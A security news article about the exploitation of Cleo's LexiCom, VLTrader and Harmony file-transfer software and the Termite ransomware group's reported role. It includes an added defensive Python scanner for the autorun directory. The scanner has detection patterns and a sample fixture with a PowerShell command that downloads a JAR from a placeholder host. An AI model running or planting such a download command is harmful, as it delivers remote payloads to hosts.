Users of Cleo's file transfer software are advised to ensure that their instances are not exposed to the Internet, following reports of widespread exploitation of a vulnerability that affects fully patched systems.
Cybersecurity company Huntress said on December 3, 2024 that it had found evidence of threat actors exploiting the issue at scale. The vulnerability, which affects Cleo's LexiCom, VLTransfer, and Harmony software, allows unauthenticated remote code execution.
The flaw is tracked as CVE-2024-50623; Cleo notes that it stems from an unrestricted file download that could open the way to arbitrary code execution.
The Illinois-based company, which has more than 4,200 customers worldwide, has since issued another advisory (CVE pending) warning of a separate "unauthenticated malicious vulnerability that could lead to remote code execution."
This development follows Huntress's finding that the patches released for CVE-2024-50623 did not fully mitigate the underlying flaw. The issue affects the following products, with a fix expected later this week:
- Cleo Harmony (up to version 5.8.0.23)
- Cleo VLTrader (up to version 5.8.0.23)
- Cleo LexiCom (up to version 5.8.0.23)
In the attacks observed by Huntress, the vulnerability is used to drop several files, including an XML file configured to execute an embedded PowerShell command that retrieves a next-stage Java Archive (JAR) file from a remote server.
Specifically, the intrusions exploit the fact that files placed in the "autorun" subdirectory of the installation folder are immediately read, interpreted, and evaluated by the vulnerable software.
At least 10 businesses have had their Cleo servers compromised, with a spike in exploitation on December 8, 2024, around 7 a.m. UTC. Evidence gathered so far suggests that the earliest date of exploitation is December 3, 2024.
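Because anything placed in the "autorun" subdirectory is read and evaluated automatically, defenders will want a quick way to audit that directory for unexpected content. The script below is an added example written for this article; it is not code from Huntress, Cleo, or the products involved. It assumes a plain-text/XML file format and searches only for generic indicators of the behaviour described above (an embedded PowerShell command and a remote JAR download); the patterns, the sample files it creates, and the `<Host>`/`<Action>` element names are all constructed for the demonstration, and the real autorun path must be supplied by the operator.

```python
import os
import re
import tempfile

# Indicators to look for inside files found in the autorun directory.
# The article only says the dropped XML embedded a PowerShell command that
# fetched a JAR from a remote server; these patterns are an assumption of
# what such content would contain, not Cleo's actual file format.
SUSPICIOUS_PATTERNS = [
    re.compile(r"powershell", re.IGNORECASE),
    re.compile(r"https?://", re.IGNORECASE),
    re.compile(r"\.jar\b", re.IGNORECASE),
    re.compile(r"-enc(odedcommand)?\b", re.IGNORECASE),
]


def scan_autorun_dir(autorun_dir):
    """Return a list of (filename, matched_patterns) for every regular file in
    autorun_dir whose contents match at least one suspicious pattern.
    Files are reported in sorted name order so results are stable."""
    findings = []
    for name in sorted(os.listdir(autorun_dir)):
        path = os.path.join(autorun_dir, name)
        if not os.path.isfile(path):
            continue
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            content = fh.read()
        hits = [p.pattern for p in SUSPICIOUS_PATTERNS if p.search(content)]
        if hits:
            findings.append((name, hits))
    return findings


def build_sample_dir():
    """Create a temporary directory holding constructed sample files
    (not real artefacts from any intrusion) so the scanner can be run offline."""
    d = tempfile.mkdtemp(prefix="autorun_demo_")
    # Benign-looking configuration entry (hypothetical element names).
    with open(os.path.join(d, "partner.xml"), "w", encoding="utf-8") as fh:
        fh.write("<Host><Alias>partner</Alias><Port>21</Port></Host>\n")
    # Constructed file mimicking the described behaviour: a command that
    # fetches a JAR from a remote server. The URL is a non-routable placeholder.
    with open(os.path.join(d, "main.xml"), "w", encoding="utf-8") as fh:
        fh.write('<Host><Action>powershell -c "iwr http://example.invalid/stage.jar"'
                 "</Action></Host>\n")
    return d


if __name__ == "__main__":
    # Replace build_sample_dir() with the real autorun path, e.g.
    # os.path.join("<CLEO_INSTALL_DIR>", "autorun"), when auditing a host.
    for filename, matched in scan_autorun_dir(build_sample_dir()):
        print(f"suspicious: {filename} matched {matched}")
```

In practice this kind of check belongs in a scheduled job or file-integrity monitor that alerts on any new file in the directory, not only on pattern hits, since an attacker-controlled file need not contain the strings above.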
Victim organizations include consumer goods companies, logistics and transportation organizations, and food suppliers. Users are advised to ensure that their software is updated to be protected against the threat.
Ransomware groups like Cl0p (aka Lace Tempest) have targeted various managed file transfer tools in the past, and the latest attack appears to be no different.
According to security researcher Kevin Beaumont (aka GossiTheDog), "Termite ransomware group operators (and possibly other groups) have zero-day exploits for Cleo LexiCom, VLTransfer, and Harmony."
Cybersecurity company Rapid7 said it has also confirmed successful exploitation of the Cleo issue against customers. Notably, Termite has taken responsibility for the recent cyberattack on supply chain firm Blue Yonder.
Broadcom's Symantec Threat Hunter Team told The Hacker News that "Termite appears to be using a modified version of dust ransomware that, when run on a machine, encrypts target files and adds a .termite extension."
"Since we saw that Blue Yonder had a copy of Cleo software exposed to the internet via Shodan, and Termite named Blue Yonder among their victims, which was also confirmed by their list and open file directory, I'd say that Gossi is correct in his statement," Jamie Levy, Huntress' Director of Adversary Tactics, told the publication.
"For what it's worth, there have been some rumblings that Termite may be the new Cl0p, and there is some data that seems to support that, as Cl0p activity has decreased and Termite activity has increased. They also work in a similar way. We're not really in the attribution game, but it wouldn't be totally surprising if we see a change in these extortion gangs at the moment."
(This is a developing story. Please check back for more updates.)